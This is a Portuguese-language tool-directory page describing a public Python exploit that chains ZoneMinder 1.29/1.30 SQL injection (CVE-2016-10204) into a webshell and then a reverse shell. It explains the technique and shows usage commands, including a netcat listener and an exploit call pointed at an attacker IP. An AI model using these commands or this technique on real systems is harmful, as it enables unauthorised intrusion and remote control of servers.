Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
zoneminder-1.29-1.30-rce-exploit — Injeção SQL não autenticada para exploit de RCE no ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC em Python de SQLi em comando único para webshell até reverse shell. | Kitploit
Ferramentas/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

Injeção SQL não autenticada para exploit de RCE no ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC em Python de SQLi em comando único para webshell até reverse shell.

Ver Repositório
há 18h 3mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ZoneMinder 1.29/1.30 SQLi para RCE Exploit

Um exploit em Python pronto para execução para ZoneMinder 1.29/1.30 que encadeia a injeção SQL não autenticada (CVE-2016-10204, EDB-41239) até uma reverse shell interativa.

Este é um PoC weaponizado/automatizado para uma CVE conhecida e corrigida, não um novo exploit.

O PoC do EDB para este bug para no payload de SQLi ou em "aponte o sqlmap para ele." Este exploit empacota a cadeia completa SQLi para webshell para shell em um único script legível.

O que ele faz

  1. Confirma a injeção com uma sonda baseada em tempo (SLEEP) no parâmetro POST limit de index.php?view=request&request=log&task=query.
  2. Escreve uma pequena webshell PHP no web root via SELECT ... INTO DUMPFILE, tentando vários caminhos comuns de ZoneMinder/Apache.
  3. Sonda a webshell ativa, então dispara uma reverse shell bash para o seu listener netcat.

As duas pegadinhas que ele resolve

  • DUMPFILE, não OUTFILE. OUTFILE escapa novas linhas e corrompe PHP multi-linha; DUMPFILE escreve bytes brutos, então a webshell permanece válida.
  • Nome de arquivo aleatório novo a cada execução. O MySQL se recusa a sobrescrever um arquivo existente, então um nome fixo colide com um drop antigo de uma execução anterior.

Uso

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Créditos

  • FOXMOLE (base do advisory para CVE-2016-10204).
  • PoC original: Exploit-DB 41239.

Licença

MIT, veja LICENSE.

Baixar ferramenta